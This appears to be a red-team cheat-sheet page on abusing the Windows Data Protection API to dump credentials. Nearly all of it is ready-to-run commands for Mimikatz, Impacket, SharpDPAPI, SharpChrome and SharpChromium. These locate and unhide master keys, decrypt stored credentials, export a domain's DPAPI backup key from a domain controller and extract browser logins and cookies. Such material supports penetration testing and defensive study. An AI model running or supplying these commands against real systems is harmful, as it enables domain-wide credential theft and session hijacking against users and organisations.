Comment on page
DPAPI

Data Protection API
​https://habr.com/ru/post/434514/​
ZN17 - Hunting for Credentials Dumping in Windows Environment (Teymur Kheirkhabarov).pdf
8MB
PDF
Master keys locations (hidden files, need -Force):
PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ (%appdata%\Microsoft\Protect\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Protect\ (%localappdata%\Microsoft\Protect\)
Credential files locations (hidden files, need -Force):
PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Credentials\ (%appdata%\Microsoft\Credentials\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ (%localappdata%\Microsoft\Credentials\)
Unhide files:
PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff
PS > cmd /c "attrib -h -s 00ff00ff00ff00ff00ff00ff00ff00ff"
Mimikatz
​https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/​
Decrypt manually offline with known plaintext password:
mimikatz # dpapi::masterkey /in:00ff00ff-00ff-00ff-00ff-00ff00ff00ff /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:Passw0rd!
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:00ff00ff00ff00ff00ff00ff00ff00ff
Impacket
Retrieve the domain DPAPI backup key (never changes) from a DC to decrypt master key and blobs:
$ dpapi.py backupkeys --export -k -no-pass -t DC01.megacorp.local
$ dpapi.py masterkey -file ./Users/Administrator/AppData/Roaming/Microsoft/Protect/<SID>/00ff00ff-00ff-00ff-00ff-00ff00ff00ff -pvk 'G$BCKUPKEY_<GUID>.pvk
$ dpapi.py credential -file ./Users/Administrator/AppData/Roaming/Microsoft/Credentials/00ff00ff00ff00ff00ff00ff00ff00ff -key 0x<HEX_MASTER_KEY>
SharpDPAPI
​https://github.com/GhostPack/SharpDPAPI#table-of-contents​
​https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpDPAPI.ps1​
Triage user's credentials, vaults, rdg and certificates:
PS > .\SharpDPAPI.exe triage /password:Passw0rd!
Triage machine's credentials (machinecredentials), vaults (machinevaults) and certificates (certificates /machine):
PS > .\SharpDPAPI.exe machinetriage
Retrieve the domain DPAPI backup key (never changes) from a DC to decrypt master key and blobs for any user in the domain with it (needs DA privileges):
PS > .\SharpDPAPI.exe backupkey /nowrap [/server:DC01.megacorp.local] [/file:key.pvk]
PS > .\SharpDPAPI.exe credentials /pvk:key.pvk [/server:PC01.megacorp.local]
SharpChrome
​https://github.com/GhostPack/SharpDPAPI#sharpchrome-commands​
PS > .\SharpChrome.exe logins|cookies [/pvk:key.pvk]
SharpChromium
​https://github.com/djhohnstein/SharpChromium​
PS > ls "C:\Users\snovvcrash\AppData\Local\Google\Chrome\User Data\Default"
PS > .\SharpChromium.exe logins
PS > .\SharpChromium.exe cookies
Tools
​https://github.com/login-securite/DonPAPI​
​https://github.com/zblurx/dploot​
​https://github.com/leftp/DPAPISnoop​
Last modified 2mo ago